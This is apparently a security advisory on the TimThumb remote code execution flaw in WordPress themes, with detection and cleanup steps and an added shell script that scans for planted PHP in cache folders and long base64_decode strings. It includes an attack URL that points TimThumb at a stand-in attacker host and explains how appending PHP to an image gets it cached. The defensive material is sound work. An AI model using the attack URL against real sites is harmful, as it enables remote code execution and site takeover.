TimThumb is prone to a remote code execution vulnerability because the script does not validate remotely cached files properly. By crafting a special image file with a valid MIME type and appending a PHP file to the end of it, it is possible to fool TimThumb into believing that it is a legitimate image, so it caches the file locally in the cache directory.
Attack URL: (Note: some websites use Base64 encoding of the src GET parameter.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
Stored file on the target: (This can vary from host to host.)
Version 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
Version 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src) means the value of the ‘src’ GET parameter, hashed with MD5.
According to markmaunder.com:
To check if you have been hacked do the following:
Sign into your server using ssh
cd to your wordpress installation directory
run “grep -r base64_decode *”
You should see a few occurrences but if any of them have a long encoded string between the parentheses, then you’re probably hacked.
The hacker used base64_decode in the file uploaded to the timthumb.php cache directory as well as where he injected code in my blog.
Also check your /tmp/ directory and if you have any suspicious files there like xwf.txt or any other .txt files, look at them in a text editor.
How to (possibly) fix this:
Go into your theme directory and figure out where timthumb.php is.
You might try: find /your/wordpress/dir/wp-content/themes/YourTheme/ -name "timthumb.php"
Edit timthumb and remove the list of external websites that content is allowed to be loaded from.
I have not audited the rest of the code, so this may or may not make it secure.
The developer really needs to use a regular expression to check the external hostnames images can be loaded from.
Alternatively:
Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed, so you should issue a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
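The checks above (locate every TimThumb copy even when renamed, look for planted PHP in the cache directory, and hunt for long base64_decode literals) can be run as one sweep. The script below is an added example; it is not code from the original post, from TimThumb, or from markmaunder.com. It assumes the WordPress root is passed as the first argument, that TimThumb copies define a VERSION constant in the form define ('VERSION', '1.19'); (an assumption about the script's layout), and uses only POSIX find, grep and sed. The function names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): a defender-side sweep automating
# the three checks the post describes.
#   1. locate copies of timthumb.php, including renamed ones, by content
#   2. find files under any cache/ directory that carry a PHP open tag
#      (the attack plants a valid image with PHP appended)
#   3. list base64_decode() calls whose string literal is suspiciously long
# Assumption: TimThumb copies contain define ('VERSION', '1.xx'); (layout assumed).

# 1. PHP files whose contents mention timthumb, regardless of file name.
find_timthumb_copies() {
    find "$1" -type f -name '*.php' -exec grep -l -s -i 'timthumb' {} +
    return 0
}

# Extract the VERSION constant from one copy (empty output if none found).
timthumb_version() {
    sed -n "s/.*define *( *['\"]VERSION['\"] *, *['\"]\([0-9.]*\)['\"].*/\1/p" "$1" | head -n 1
}

# 2. Files under any cache/ directory that contain a PHP open tag.
#    The extension is ignored on purpose: the cached name is an MD5 hash.
find_php_in_cache() {
    find "$1" -type f -path '*/cache/*' -exec grep -l -s '<?php' {} +
    return 0
}

# 3. base64_decode('....') with a literal of at least $2 (default 100) chars.
#    /dev/null is passed so grep always prints a file name prefix.
find_long_base64() {
    min=${2:-100}
    find "$1" -type f -name '*.php' -exec grep -n -E \
        "base64_decode[[:space:]]*\([[:space:]]*['\"][A-Za-z0-9+/=]{$min,}" /dev/null {} + \
        | cut -d: -f1,2
    return 0
}

# Print a report for a WordPress root; the post names 1.34 as the fixed version.
scan_wordpress() {
    root=$1
    echo "== TimThumb copies (fixed in 1.34 according to the post) =="
    find_timthumb_copies "$root" | while read -r f; do
        printf '%s  version=%s\n' "$f" "$(timthumb_version "$f")"
    done
    echo "== cache files containing a PHP open tag =="
    find_php_in_cache "$root"
    echo "== long base64_decode literals (file:line) =="
    find_long_base64 "$root"
}

# Usage: sh timthumb-sweep.sh /path/to/wordpress
if [ -n "${1:-}" ]; then
    scan_wordpress "$1"
fi
```

Run it from outside the WordPress tree and read the report top to bottom: any copy older than 1.34, any cache entry with a PHP tag, or any long base64 literal is something to inspect by hand. The 100-character threshold is a heuristic; legitimate plugins do call base64_decode on short strings, which is why the post says "long".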